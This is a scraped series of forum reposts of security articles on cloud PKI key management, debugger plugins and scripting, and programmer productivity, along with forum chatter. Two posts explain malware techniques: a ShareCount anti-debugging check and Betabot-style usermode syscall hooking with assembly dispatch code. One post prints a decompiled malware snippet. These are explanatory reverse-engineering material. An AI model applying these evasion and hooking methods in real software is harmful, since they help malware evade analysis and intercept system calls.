PKI is a hierarchical model comprised of the components below: Certificate Authority (CA): This entity issues certificates for the requests received. It can be in-house or a trusted third-party CA like ‘Verisign’, ‘COMODO’, ‘Thawte’, etc. Registration Authority (RA): This entity performs background checks on the requests received from end-point entities, such as verifying their business operations, in order to avoid issuing a certificate to a bogus entity. Certificate Revocation List (CRL): A published list of certificates that are no longer valid to be trusted. End-point Entities: These entities request certificates in order to prove their identity and gain trust over the Internet. Certificates Repository: The repository containing the list of issued certificates, which end-point entities can retrieve in order to verify the corresponding server. For end users, this repository is usually located in the browser, such as Firefox, IE, Chrome, etc. As can be noted, the maintenance of these keys is of utmost importance, and losing control over them renders the encryption of data useless. Key management is an important and most challenging process, as any deviation could lead to data loss. The key management life cycle involves the following steps: Creation The first step in the key management life cycle is to create a key pair and apply access control around it. While creating the key, certain important factors need to be considered, like key length, lifetime, encryption algorithm, etc. The new key thus created is usually a symmetric key, and it is encrypted with the public key of a public-private key pair. Backup Before distributing keys, a backup of the keys should first be made to some external media. 
As the key created is normally a symmetric key, a.k.a. a shared key, encrypted with the public key from the key pair, it becomes important to protect the other part of the key pair, i.e. the private key. Also, the policies around the backup media and vaults should be held to the same standard as those designed for any critical business operation, in order to recover from any type of disruption. Deployment After the key is created and backed up, it is ready to be deployed in the encryption environment. It is advisable not to put these keys directly into action on the production environment. The key operations should be analyzed first and, if successful, the key should then be used to encrypt production data. Monitoring Monitoring of the crypto systems is very important, to check for unauthorized administrative access and key operations such as creation, backup, restore, archival and destruction. Rotation Keys should be rotated on a regular basis, replacing keys that are about to expire or that need to be changed following a business change. It is important that retired keys are not put back into the system. Expiration As per the best practices dictated by compliance regimes like PCI-DSS, even valid keys need to be changed after a span of time, not only once they have expired. Before the expiration phase, the key rotation phase should take place, re-protecting the associated data with new keys. Archival Before the destruction of keys, archival of expired and decommissioned keys is important if there is still related data in the environment that may need to be recovered, e.g. for recovery operations. This phase is very important from the business-decision perspective, and there are some appliances that never go through the destruction phase, which carries an attached risk. Archived copies of the keys should be properly secured. 
Destruction After the business use of a key is over or its validity expires, secret and private keys should be destroyed in an efficient manner. All traces of the keys should be completely removed from the whole environment, even from removable media and the vaults where the keys were stored for backup purposes. [h=2]PKI Risks on Migrated Data[/h] We cannot sit back and relax after implementing a PKI over the business applications and data migrated to the cloud, because when data migrates to the cloud, various issues tend to arise, such as: Because of the way the cloud model is designed, control over the data migrated to the cloud is completely lost. The key management server, which is responsible for storing and managing keys – if it is hosted in the cloud, there is a risk on the CSP (Cloud Service Provider) side: how can we be sure that the CSP is keeping our keys secure, i.e. what access control mechanisms, SOD (segregation of duties) and policies has the CSP put in place? If some third-party vendor solution is leveraged for the PKI deployment: where are all the keys used; what key management model is the vendor using; how does the vendor ensure that, even if deployed in the cloud, customer keys are secured from the vendor's remote access (SaaS APIs) and from Virtual Machine (VM) corruption events – for example, what happens if a snapshot of the VM is stolen: will the keys reside in the snapshot, and if yes, for how long? How do we ensure that, if the customer has leveraged a vendor's PKI SaaS service, even the vendor does not have access to the customer's keys, and what measures has the vendor implemented to address multi-tenancy? After decommissioning systems in the cloud, how do we ensure that data is completely removed from them? [h=2]Recommendations[/h] The sections below describe some of the best practices and designs that organizations must follow in order to reap the true benefits of PKI in the cloud. 
The key management server should be hosted within the organization, and whenever the data hosted in the cloud needs keys for decryption as part of an end-user request, the key management server provides them. The key used for decryption should never be stored in the cloud VMs and should reside in memory only for the instant it is needed. With the model discussed above, all the data leaving and entering the organization can be encrypted and decrypted respectively. All the VMs hosted in the cloud must be encrypted, to protect against data loss should a VM snapshot be stolen. When encrypted data placed in the cloud is no longer needed, the organization must revoke the keys associated with it, so that even if some trail of data remains in a decommissioned VM, it cannot be decrypted. A Hardware Security Module (HSM) should be used to store keys for cryptographic operations such as encryption, decryption, etc. The use of old and insecure algorithms like the Data Encryption Standard (DES) must be avoided. [h=2]Conclusion[/h] An environment with a poorly managed Public Key Infrastructure (PKI) is as good as an environment with no PKI. However, when organizations plan to migrate data to a cloud and decide to implement PKI on any cloud model, i.e. public or private, they should make sure that complete ownership of the keys remains with them. [h=2]References[/h] https://cloudsecurityalliance.org/guidance/csaguide.v3.0.pdf http://research.microsoft.com/pubs/132506/distributed%20key%20lifecycle%20management.pdf The Key Management Lifecycle (The Falcon's View) By Lohit Mehta|June 30th, 2014 Sursa: Public Key Infrastructure (PKI) in the Cloud - InfoSec Institute
  17. Extending Debuggers Sometimes we come across situations where we need to do something extra inside our debuggers, or to extend their functionality. For such things, debuggers usually provide an API interface. There are two types of API provided by debuggers: 1: SDK API 2: Scripting API One can choose either, based on the requirements. Usually when there is a rapid requirement, scripting comes in handy, but if something requires system or low-level access, then the SDK is useful. SDK plugins must be compiled, while scripts can be modified easily. Ollydbg Plugin Interface Ollydbg supports an API for plugins. Plugins are compiled DLLs written in the C programming language. The following constants define particular actions in a debugger context.

#define ODBG_Plugindata _ODBG_Plugindata
#define ODBG_Plugininit _ODBG_Plugininit
#define ODBG_Pluginmainloop _ODBG_Pluginmainloop
#define ODBG_Pluginsaveudd _ODBG_Pluginsaveudd
#define ODBG_Pluginuddrecord _ODBG_Pluginuddrecord
#define ODBG_Pluginmenu _ODBG_Pluginmenu
#define ODBG_Pluginaction _ODBG_Pluginaction
#define ODBG_Pluginshortcut _ODBG_Pluginshortcut
#define ODBG_Pluginreset _ODBG_Pluginreset
#define ODBG_Pluginclose _ODBG_Pluginclose
#define ODBG_Plugindestroy _ODBG_Plugindestroy
#define ODBG_Paused _ODBG_Paused
#define ODBG_Pausedex _ODBG_Pausedex
#define ODBG_Plugincmd _ODBG_Plugincmd

Plugins for Ollydbg are written as a shared library in C. We need to define the DLL entry point and initialize the plugin before it is used. Events are also defined using exports. Plugins are initialized via the ODBG_Plugininit() export function. 
/*******************************************************
 * Sample Ollydbg plugin file
 *******************************************************/
#include <windows.h>
#include <stdio.h>
#include <plugin.h>

#pragma comment(lib, "ollydbg.lib") // Include the library file

HINSTANCE hinst; // Plugin instance

BOOL WINAPI DllEntryPoint(HINSTANCE hi, DWORD reason, LPVOID reserved)
{
    if (reason == DLL_PROCESS_ATTACH)
        hinst = hi;          // Mark plugin instance
    return 1;                // Report success
}

extc int _export cdecl ODBG_Plugininit(int ollydbgversion, HWND hw, ulong *features)
{
    return 0;                // Initialization successful
}

extc void _export cdecl ODBG_Pluginmainloop(DEBUG_EVENT *debugevent)
{
}

extc void _export cdecl ODBG_Pluginaction(int origin, int action, void *item)
{
    if (origin == PM_MAIN) {
        switch (action) {
        case 0:
            break;
        case 1:
            MessageBox(NULL, "Hello World", "Hello World! Plugin", MB_OK);
            break;
        default:
            break;
        }
    }
}

Immunity Scripting Immunity Debugger also supports scripting, based on the Python programming language. The scripts written for Immunity Debugger are known as pycommands. They can be executed from the command bar as !scriptname. Immunity scripting supports breakpoints, hooking, and loggers. The default skeleton for a pycommands script is:

#!/usr/bin/python
import immlib

def main(args):
    dbg = immlib.Debugger()
    return ""

dbg = immlib.Debugger() creates an instance of the Debugger class; some of its basic functions are explored below. The script's main body is located in the main function, with the arguments in args. 
To execute the script, we place the file in the "C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands" directory and execute it from the Immunity command bar as !filename. Let's now create a dummy hello world script that writes to the log window:

import immlib

def main(args):
    dbg = immlib.Debugger()
    dbg.log("Hello world!")
    return ""

We can save this file in "C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands" as helloworld.py, and it can be executed using the following command: !helloworld There are more functions inside the Debugger() class; let's try to explore and use them. Getting the PEB address getPEBAddress() is a method inside the Debugger class that can be used to get the PEB address of the application loaded inside the debugger. We can use the PEB address to patch many things. The PEB (Process Environment Block) mainly holds process-wide structures and information, such as the list of loaded modules:

typedef struct _PEB {
    BYTE Reserved1[2];
    BYTE BeingDebugged;
    BYTE Reserved2[1];
    PVOID Reserved3[2];
    PPEB_LDR_DATA Ldr;
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
    BYTE Reserved4[104];
    PVOID Reserved5[52];
    PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
    BYTE Reserved6[128];
    PVOID Reserved7[1];
    ULONG SessionId;
} PEB, *PPEB;

For example, here is what a piece of malware does with the PEB's loaded-module data (decompiler output):

v9 = *(_DWORD *)"LoadLibraryExA";
v10 = *(_DWORD *)&aLoadlibraryexa[4];
v11 = *(_DWORD *)&aLoadlibraryexa[8];
v12 = *(_WORD *)&aLoadlibraryexa[12];
v13 = aLoadlibraryexa[14];
v15 = sub_4001E92();
v20 = 0;
v16 = (int (__thiscall *)(int, int, int *))sub_4001EA7(v15, "GetProcAddress");
v20 = v16(v5, v15, &v9);
v3 = a1;
result = *(_DWORD *)(a1 + 60);
for ( i = a1 + *(_DWORD *)(result + a1 + 128); *(_DWORD *)(i + 4) || *(_DWORD *)(i + 12); i += 20 )
{
    v7 = v3 + *(_DWORD *)i;
    for ( j = v3 + *(_DWORD *)(i + 16); ; j += 4 )
    {
        result = *(_DWORD *)v7;
        if ( !*(_DWORD *)v7 )
            break;
        v15 = -1;
        if ( result < 0 )
        {
            v2 = (unsigned __int16)result;
            v15 = (unsigned __int16)result;
        }
        v14 = v3 + result;
        v8 = *(_DWORD *)(i + 12);
        v17 = v3 + v8;
        v19 = ((int (__fastcall *)(int, int, int, _DWORD, _DWORD))v20)(v3, v2, v3 + v8, 0, 0);
        if ( v15 == -1 )
        {
            v17 = v14 + 2;
            v18 = ((int (__stdcall *)(int, int))v16)(v19, v14 + 2);
        }
        else
        {
            v17 = v15;
            v18 = ((int (__stdcall *)(int, int))v16)(v19, v15);
        }
        if ( *(_DWORD *)j != v18 )
            *(_DWORD *)j = v18;
        v3 = a1;
        v7 += 4;
    }
}
return result;

This code snippet walks the PEB loaded modules and parses the IAT. Now let's try to write a call counter in pycommands:

import immlib
from immlib import LogBpHook

times = 0

class instructionHook(LogBpHook):
    def __init__(self):
        LogBpHook.__init__(self)

    def run(self, regs):
        global times
        imm = immlib.Debugger()
        imm.log("instruction Executed %d" % times)
        times = times + 1

def main(args):
    memlocation = 0x401029
    dbg = immlib.Debugger()
    logbp = instructionHook()
    funcName = dbg.getFunction(memlocation).getName()
    logbp.add(funcName, memlocation)
    return "Hooks Placed"

By SecRat|June 25th, 2014 Sursa: Extending Debuggers - InfoSec Institute
  18. [h=3]ShareCount As Anti-Debugging Trick[/h]In this post I will share with you an anti-debugging trick that is very similar to the "PAGE_EXECUTE_WRITECOPY" trick mentioned here, where we had to flag the code section as writable so that any memory write to its page(s) would force the OS to change the page protection from PAGE_EXECUTE_WRITECOPY to PAGE_EXECUTE_READWRITE. But in this case we don't have to make any modifications to the code section's page protection. We will just query the process for its current working set info. Among the information we receive when querying the working set of a process are two fields, "Shared" and "ShareCount". By default the OS assumes the memory pages of the code section (non-writable sections) should share physical memory across all process instances. This holds until one process instance commits a memory write to the shared page. At that point the page is no longer shared. Thus, querying the working set of the process and inspecting the "Shared" and/or "ShareCount" fields for our code section pages would reveal the presence of a debugger, but only if the debugger uses INT3 breakpoints. To implement the trick, all you have to do is call the "QueryWorkingSet" or "QueryWorkingSetEx" function. N.B. You can also use the "ZwQueryVirtualMemory" function with the "MemoryInformationClass" parameter set to MemoryWorkingSetList for more portable code. Code from here and demo from here. Tested on Windows 7. For any suggestions, leave me a comment or drop me a mail waliedassar@gmail.com. Sursa: waliedassar: ShareCount As Anti-Debugging Trick
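The check above can be sketched by decoding the per-page entries that QueryWorkingSet returns. On 32-bit Windows each entry is a PSAPI_WORKING_SET_BLOCK, a bitfield laid out as Protection:5, ShareCount:3, Shared:1, Reserved:3, VirtualPage:20 (per psapi.h). The sketch below only decodes such entries and applies the detection logic; actually obtaining the entries requires calling QueryWorkingSet (e.g. via ctypes) on Windows, which is omitted here. The example entry values at the bottom are fabricated for illustration.

```python
# Sketch of the ShareCount anti-debug check: decode 32-bit
# PSAPI_WORKING_SET_BLOCK entries and look for code pages that
# have lost their "Shared" status (e.g. because a debugger wrote
# an INT3 breakpoint byte, forcing a private copy-on-write copy).

def decode_ws_entry(flags: int) -> dict:
    """Decode one 32-bit working-set entry (layout from psapi.h)."""
    return {
        "protection":   flags & 0x1F,         # bits 0-4
        "share_count": (flags >> 5) & 0x7,    # bits 5-7
        "shared":      (flags >> 8) & 0x1,    # bit 8
        "virtual_page": flags >> 12,          # bits 12-31
    }

def looks_debugged(code_page_entries) -> bool:
    """True if any code-section page is no longer shared."""
    return any(decode_ws_entry(f)["shared"] == 0 for f in code_page_entries)

# Fabricated example entries: a still-shared executable page vs. one
# made private by a breakpoint write.
shared_page  = (0x00401 << 12) | (1 << 8) | (2 << 5) | 0x02
private_page = (0x00402 << 12) | (0 << 8) | (0 << 5) | 0x02
print(looks_debugged([shared_page]))                # False
print(looks_debugged([shared_page, private_page]))  # True
```

A real implementation would fill `code_page_entries` from the `WorkingSetInfo` buffer returned by QueryWorkingSet, filtered to the pages of the module's code section.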
  19. [h=3]Usermode System Call hooking - Betabot Style[/h] This is literally the most requested article ever; I've had loads of people messaging me about it (after the Betabot malware made it famous). I had initially decided not to write an article about it, because it was fairly undocumented and writing one might have led to more people using it; however, yesterday someone linked me to a few blogs posting their implementations of the hook code (without explanation), so I've finally decided to go over it, seeing as the code is already available. [h=2]Win32/64 System Calls[/h] System call is a term used to describe functions that do not execute code in usermode; instead they transfer execution to the kernel, where the actual work is done. A good example of these is the native API (e.g. NtCreateFile\ZwCreateFile). None of the functions beginning with Nt or Zw actually do their work in usermode; they simply call into the kernel and allow the kernel-mode function with the same name to do the work (ntdll!NtCreateFile calls ntoskrnl!NtCreateFile). Before entering the kernel, all native functions execute some common code, known as KiFastSystemCall on 32-bit Windows and WOW32Reserved under WOW64 (32-bit process on 64-bit Windows). [Figure: Native function call path in user mode under Windows 32-bit] [Figure: Native function call path in user mode under WOW64] As is evident in both examples, Nt* functions make a call via a 32-bit pointer to KiFastSystemCall (x86) or X86SwitchTo64BitMode (WOW64). Theoretically we could just replace the pointer at SharedUserData!SystemCallStub or WOW32Reserved with a pointer to our code; however, in practice this doesn't work. 
SharedUserData is a shared page mapped into every process by the kernel, thus it's only writable from kernel mode. On the other hand, WOW32Reserved is writable from user mode, but it exists inside the thread environment block (TEB), so in order to hook it we'd have to modify the TEB for every running thread. [h=2]KiFastSystemCall Hook[/h] Because SharedUserData is non-writable, the only other place we can target is KiFastSystemCall, which is 5 bytes (enough space for a 32-bit jump). Sadly that actually turned out not to be the case, because the last byte, 0xC3 (retn), is needed by KiFastSystemCallRet and cannot be modified, which leaves only 4 writable bytes. The sysenter instruction is supported by all modern CPUs and is the fastest way to enter the kernel. On ancient CPUs (before sysenter was invented) an interrupt was used (int 0x2E); for compatibility it was kept in all subsequent versions of Windows. [Figure: The now obsolete KiIntSystemCall] Here you can see KiIntSystemCall has a glorious 7 writable bytes (enough space for a 32-bit jump and some); it's also within short jump range of KiFastSystemCall. As you've probably guessed by now, we can do a 2-byte short jump from KiFastSystemCall to KiIntSystemCall and then a 32-bit jump from within KiIntSystemCall to our hook procedure. Now, what if something calls KiIntSystemCall? Well, it's unlikely, but we can handle that too. The rule for the direction flag on Windows is that it should always be cleared after a call (that is, a function should never assume it is still set after making a call). We could use the first byte of KiIntSystemCall for STD (set direction flag), then use the first byte of KiFastSystemCall for CLD (clear direction flag) followed by a jump to KiIntSystemCall+1; that way our hook procedure can use the direction flag to see which calls came from which function. 
[h=2]WOW32Reserved Hook[/h] This is a lot simpler: either we can keep track of every thread and hook WOW32Reserved in each thread's environment block (I think this is what Betabot does), or we simply overwrite X86SwitchTo64BitMode, which is 7 bytes, writable from user mode, and pointed to by the WOW32Reserved field of every thread's environment block. [h=2]Dispatching[/h] Most people who write hooks are used to redirecting one function to another; however, because both of these hooks are placed on common code, every single native function will call the hook procedure. Obviously we're going to need a way to tell NtCreateFile calls from NtCreateProcess and so on, or the process is just going to crash and burn. If we disassemble the first 5 bytes of any native function it will always be "mov eax, XX"; this value is the ordinal of the function within the System Service Dispatch Table (SSDT). Once the call enters the kernel, this number identifies which entry in the SSDT to call (meaning each function has a unique number). When our hook is called, the SSDT ordinal will still be in the eax register. All we need to do is gather the SSDT ordinals for all the functions we need (by disassembling the first 5 bytes); then we can compare the number in eax with the ordinal of the function we wish to intercept calls for: if it's equal we process the call, if not we just call the original code. Comparing the function ordinal with the one we want to hook could be messy, especially if we're hooking multiple functions.

cmp eax, [ntcreatefile_ordinal]
je ntcreatefile_hook
cmp eax, [ntcreateprocess_ordinal]
je ntcreateprocess_hook
[...]
jmp original_code

This code is going to get very long and inefficient the more functions are hooked (because every kernel call passes through this code, the system could slow down), but there's a better way. 
We can build an array of DWORDs in memory (assuming we just want to hook NtCreateFile & NtCreateProcess, and say the NtCreateFile ordinal is 0x02 and the NtCreateProcess ordinal is 0x04); the array would look like this:

my_array+0x00 = (DWORD)NULL
my_array+0x04 = (DWORD)NULL
my_array+0x08 = (DWORD)ntcreatefile_hook_address
my_array+0x0C = (DWORD)NULL
my_array+0x10 = (DWORD)ntcreateprocess_hook_address
[...]

Then we could do something as simple as:

lea ecx, [my_array]
lea edx, [4*eax+ecx]    ; edx will be &my_array[eax]
cmp dword [edx], 0
je original_code
call [edx]              ; call the address pointed to by edx

This is pretty much what the kernel code for calling an SSDT function by its ordinal does. [h=2]Calling Original Code[/h] As with regular hooking, we just need to store the original code before we hook it. The only difference here is that, as well as pushing the parameters and calling the original code, the function's ordinal will need to be moved into the eax register. [h=2]Conclusion[/h] Feel free to ask any questions in the comments or on our forum; hopefully this post has covered everything already. Posted by TM Sursa: MalwareTech: Usermode System Call hooking - Betabot Style
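The dispatching scheme from the article (read the SSDT ordinal out of each function's "mov eax, imm32" stub, then dispatch through an ordinal-indexed table) can be sketched in Python. The stub bytes and ordinals below are fabricated for illustration; real ordinals vary between Windows builds.

```python
# Sketch of ordinal-based dispatch: recover each native function's SSDT
# ordinal from its "mov eax, imm32" prologue, then use an ordinal-indexed
# table so the common hook costs one lookup per system call.
import struct

def ssdt_ordinal(stub: bytes) -> int:
    # First 5 bytes of every 32-bit Nt* function: B8 xx xx xx xx (mov eax, imm32)
    assert stub[0] == 0xB8, "expected 'mov eax, imm32'"
    return struct.unpack_from("<I", stub, 1)[0]

# Hypothetical stub bytes, standing in for the first 5 bytes of ntdll exports
ntcreatefile_stub    = b"\xB8\x42\x00\x00\x00"  # mov eax, 0x42
ntcreateprocess_stub = b"\xB8\x4F\x00\x00\x00"  # mov eax, 0x4F

# ordinal -> handler: the Python analogue of the DWORD array in the article
hooks = {
    ssdt_ordinal(ntcreatefile_stub):    lambda: "ntcreatefile_hook",
    ssdt_ordinal(ntcreateprocess_stub): lambda: "ntcreateprocess_hook",
}

def dispatch(eax: int) -> str:
    """What the common hook does with the ordinal left in eax."""
    handler = hooks.get(eax)        # 'cmp [edx], 0 / je original_code'
    return handler() if handler else "original_code"

print(dispatch(0x42))   # ntcreatefile_hook
print(dispatch(0x99))   # original_code
```

A dict keyed by ordinal plays the role of the sparse DWORD array: unhooked ordinals miss the table and fall through to the original code, so only hooked calls pay for handler logic.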
  20. Hi, I'd like to know if any of you are doing an IT security master's in Bucharest. I've heard there are a few options: 1. Politehnica: SRIC (Securitatea Retelelor Informatice Complexe): http://acs.pub.ro/doc/planuri%20master/ro/2011/SRIC.pdf or MPI (Managementul si Protectia Informatiei): http://acs.pub.ro/doc/planuri%20master/ro/2011/MPI.pdf 2. The Military Technical Academy: Information Technology Security: MTA - Master InfoSec 3. The Academy of Economic Studies: ISM (IT&C Security Master): ISM - IT&C Security Master - Informatics Security Master 4. The Romanian Intelligence Service (SRI): Intelligence and national security (I think). The SRI master's was recommended to me by two people (one from the MPI master's at Poli and another who didn't enroll in a master's), who say it's supposedly the most concrete and the best one. First of all, I couldn't find out what subjects are taught there. Then I found some nasty conditions: "For the entire duration of the program, students will have the status of employees of the Romanian Intelligence Service, with all the rights and obligations deriving from it", "they agree that, after completing the master's program to which they were admitted, they will carry out activities in any area of the national territory, according to the interests and needs of the institution", "they accept, if admitted, the prohibition or restriction of the exercise of certain civil rights and freedoms provided by the legislation in force", "they accept checks on their activity and behavior", etc. Let's be serious. So I'm thinking of applying to Poli, with ASE as the backup option in case I don't get into the others. More precisely, I've heard the best things about SRIC, but MPI also seems acceptable: less technical, but maybe useful, more business-oriented, I don't know. As for ATM, I'm not really sure; I'm afraid of ending up with some outrageous conditions, like having to work for them or who knows what. 
Anyway, I saw that you have to do some "internship", which may well amount to "working for them for free" for a few months, and that doesn't tempt me. ASE is the lighter version; as we all know it's full of women and I'd go to classes with pleasure, the problem is I wouldn't learn much. But hey, I can study what interests me in my free time. It would be the easiest way to get the diploma, but it wouldn't be as recognized as one from Poli. So my choice would be SRIC. What do you think? If there are people who know more details, I'd be interested in: 1. When are the classes? Weekends, evenings, or during the day too? 2. How much does attendance matter? Because I won't be able to show up there too often. 3. How stressful are the projects? Do you have to do projects you'd work on for ages, or something lighter? 4. How good are the subjects taught? How are they taught? Is it a joke? 5. Which of them are state-funded and which are fee-based? Not very important, but state-funded would be nicer, though I don't expect to get a spot. 6. What's the "environment" like there, what are the students like, what are the classes like, etc.? I don't know, any information would help me. Well, it's pretty hard to change my mind about SRIC, but for now it's my first option. The second is ASE, just in case. What do you say? Please don't comment if you have nothing to do with the subject. Thanks. Edit: If I apply to ASE and get in, I don't think I can still apply to Poli. So most likely I'll only apply to Poli: SRIC and MPI. And the ASE people, once you're admitted, make you pay the first semester's fee quickly.
  21. Hi, As a concrete example, there are people, even on the staff (I won't name names, maybe), who ended up here searching for things like: CQ Killer. And look at that, they went on to work at companies whose products you use daily and learned things you wouldn't even dream of ever knowing. Kids looking for "hacks" are very attracted to this field, IT security, and a large part of them, having come here for all sorts of nonsense, end up seeing that the field is much more diverse and start exploring it. That section doesn't seem useful to me either, because I don't play games. Well, I do, but only this one: http://www.flasharcade.com/tower-defence-games/play/azgard-tower-defense.html . If there are beginners around here, I recommend they open that link, download Cheat Engine and try to cheat at this game by changing the amount of money available. Cheat Engine searches the memory of the process (FlashPlayer_*) for a given value; for example, if you have 123 dollars, you search for that value. There may be several pieces of data in memory with the value 123. So you spend some money and are left with, say, 111 dollars. You search again, for the value 111, with "Next Scan", among the addresses you had already found, and you'll find the memory address where the number of dollars is stored, which you can then change to 9999999. Try it. Note: it's the only way I managed to finish that damn little game. It has 100 stages.
  22. It's too abstract. There's nothing concrete.
  23. How to destroy Programmer Productivity

The following image about programmer productivity is making its rounds on the internet:

As Homer Simpson might say, it's funny because it's true. I haven't figured out the secret to being productive yet, largely because I have never been consistently productive. Ever. Joel Spolsky talks about this in one of his blog posts:

Sometimes I just can't get anything done. Sure, I come into the office, putter around, check my email every ten seconds, read the web, even do a few brainless tasks like paying the American Express bill. But getting back into the flow of writing code just doesn't happen. These bouts of unproductiveness usually last for a day or two. But there have been times in my career as a developer when I went for weeks at a time without being able to get anything done. As they say, I'm not in flow. I'm not in the zone. I'm not anywhere.

I've read that blog post about half a dozen times now, and it still shocks me that someone we see as an icon in the programmer community has a problem getting started. I'm glad I'm not alone. I'm not here to share any secret methods to being productive, but I can tell you what has kept me from being productive:

Open floor plans
Developers arguing about Django vs. .NET
Developers arguing in general
A coworker coming up to me and asking, "Hey, did you get that email I sent?"
Chewing (apparently I suffer from misophonia)
Not understanding the problem I'm working on
Not really believing in the project
Not understanding where to start
Facing more than one task that needs to be complete BECAUSE THINGS ARE ON FIRE RIGHT NOW
Things BEING ON FIRE RIGHT NOW DROP EVERYTHING
Twitter
Notifications on my phone
Email pop-ups
Really, any pop-ups
IMs
My wife asking, "Hey, when you have a minute could you do X?"
Long build times
Noise
Constant parade of people going past my desk
MandoFun
Wikipedia (seriously, don't click on any links)
Hacker News
The internet in general

Things that have contributed to making me productive in the past:

Quiet atmosphere
Quiet workspace (a private office works wonders)
Understanding the next step I need to take in a project
Knowing the problem space well
No interruptions
Seriously: no interruptions
Staying off Twitter
Staying off Hacker News
No hardware problems
Loving the project I'm working on
Short build + debug time
Not debating politics on the internet

It's telling that half of the things that keep me from being productive are problems I've created; but some of them aren't, like open office floor plans. Ultimately, each of us controls what makes us unproductive. I suck at peaceful confrontation. I either come off too strongly, or I sit there and let the other person walk all over me. I'm really not good at it at all. I don't have any good advice for handling the external forces that contribute to not being productive, but I do know this: whatever I can control, I should control. That means:

Turning off notifications on my iPhone (this has the added benefit of increased battery life)
Giving myself a reward for 3 hours of continuous coding (usually in the form of "internet time" like checking Hacker News or Twitter)
Working from home when I really, really need to get something done
Investing in a good-for-the-price pair of noise-canceling headphones
Scheduling 'no meeting' times on my calendar. These are times shown as busy to everyone else. It's my work time.
Not getting into programmer arguments around the office; people have strong opinions, and the programmers who have arguments love to argue. If there's an actual business problem that needs to be solved, let's grab a conference room and come up with the advantages and disadvantages of each approach. Let's get some data. Let's not just argue.
Positioning my desk in such a way that passersby aren't distracting.
Taking a first pass at the problem, and *then* asking another developer to walk me through it so that I can get a better understanding of what to do. This accomplishes two things: first, it allows me to get the 'lay of the land' so that I'll at least have a basic understanding of the forces at work, and second, it allows me to ask more intelligent questions when I ask for help.

What makes you unproductive, and what do you do to combat it?

Source: How to destroy Programmer Productivity | George Stocker
  24. The Parliament of Romania adopts the present law. Download: http://www.cdep.ro/proiecte/2014/200/60/3/pl263.pdf